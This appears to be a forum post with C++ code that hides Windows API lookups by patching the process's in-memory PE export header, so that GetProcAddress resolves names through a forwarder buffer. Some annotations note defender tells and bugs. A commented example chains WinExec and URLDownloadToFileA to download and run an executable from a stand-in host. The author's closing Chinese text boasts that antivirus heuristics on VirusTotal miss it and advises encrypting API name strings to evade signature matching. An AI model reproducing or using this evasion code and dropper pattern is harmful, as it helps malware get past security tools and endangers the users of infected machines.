// Demo of indirect API resolution. The wanted "<dll>.<func>" name is never
// handed to GetProcAddress directly; instead the process's own in-memory PE
// header is patched so that the loader reads the exported buffer szFile as a
// forwarder string and resolves the target on the caller's behalf.
//
// Defender notes — what is observable from the outside:
//   1. VirtualProtect(PAGE_EXECUTE_READWRITE) on the main module's header
//      page (the page holding IMAGE_NT_HEADERS), followed by a write there.
//   2. The export directory Size field of the mapped image no longer matches
//      the on-disk file (it is forced to 0x80000000 for the rest of the
//      process lifetime; only the page protection is restored afterwards).
//   3. The API name is assembled at runtime from two halves, so a static
//      string match on the full name will not fire (the author says as much
//      in the notes below this listing).
// Header-integrity checks (mapped vs. on-disk IMAGE_NT_HEADERS), hooks on
// VirtualProtect targeting an image's first page, and GetProcAddress calls
// that name a data export of the main executable are the cheap tells.

// Exported, writable buffer whose contents GetProcAddress later interprets
// as a forwarder string "<lpszDll>.<lpszFunc>". 100 bytes; the strcpy_s /
// strcat_s template overloads below deduce this size and invoke the
// invalid-parameter handler instead of overflowing it.
extern "C" __declspec(dllexport) CHAR szFile[100] = {0};

// Resolve lpszFunc from lpszDll through the forwarder trick.
// Returns the resolved address as a ULONG (truncated on 64-bit builds —
// HMODULE/FARPROC are pointer-sized) or 0 when GetProcAddress fails.
// Side effect: on the first call that sees an unpatched header, permanently
// rewrites the export directory Size of the main module's mapped headers.
ULONG __stdcall xGetProc( LPCSTR lpszDll, LPCSTR lpszFunc)
{
    // NOTE(review): only zero-filled here and only InitializeCriticalSection'd
    // inside the patch branch below. If the header is already patched on the
    // first call, or two threads race into the first call, Enter/Leave run on
    // an uninitialised CRITICAL_SECTION.
    static CRITICAL_SECTION cs = {0};
    HMODULE hSelf = NULL;
    PIMAGE_DOS_HEADER pDosHead = NULL;
    PIMAGE_NT_HEADERS pNtHead = NULL;
    PDWORD pExportSize = NULL;

    // Walk the main executable's own PE headers: DOS header -> e_lfanew ->
    // NT headers -> export data directory. e_lfanew is trusted as-is.
    hSelf = GetModuleHandle( NULL);
    pDosHead = (PIMAGE_DOS_HEADER)hSelf;
    pNtHead = (PIMAGE_NT_HEADERS)((LPBYTE)pDosHead + pDosHead->e_lfanew);
    pExportSize = &pNtHead->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;

    // One-time header patch. Making the export directory "cover" the whole
    // address space is what makes the loader treat szFile's address as lying
    // inside the export table and therefore as a forwarder string
    // (documented forwarder semantics of GetProcAddress — confirm against
    // the target OS build). Neither VirtualProtect result is checked; if the
    // first one fails the write below faults on a read-only header page.
    if ( *pExportSize < 0x80000000)
    {
        InitializeCriticalSection( &cs);
        DWORD oldProtect = NULL;
        VirtualProtect( pExportSize, sizeof(DWORD), PAGE_EXECUTE_READWRITE, &oldProtect);
        *pExportSize = 0x80000000;
        // Protection is restored, the patched Size value is not.
        VirtualProtect( pExportSize, sizeof(DWORD), oldProtect, &oldProtect);
    }

    // szFile is a single process-wide buffer, hence the lock: build
    // "<lpszDll>.<lpszFunc>" in it, then ask for our own export "szFile" so
    // the loader follows the forwarder and returns the real target address.
    EnterCriticalSection( &cs);
    strcpy_s( szFile, lpszDll);
    strcat_s( szFile, ".");
    strcat_s( szFile, lpszFunc);
    ULONG uRet = (ULONG)GetProcAddress( hSelf, "szFile");
    LeaveCriticalSection( &cs);
    return uRet;
}
// xGetProc( "kernel32", "WinExec"); // ((void )((__stdcall *)xGetProc( "urlmon", "URLDownloadToFileA"))(int,char*,char*,int,int)) // (0, "htt://www.123123.com/123.exe", "123.exe", 0, 0); // 。。。。。。。
上面是演示代码
https://www.virustotal.com/zh-cn/
这上面杀毒软件的启发式查毒引擎全都查不出来。
当然，有些引擎会直接匹配“URLDownloadToFileA”之类的字串，得把字串加密一下。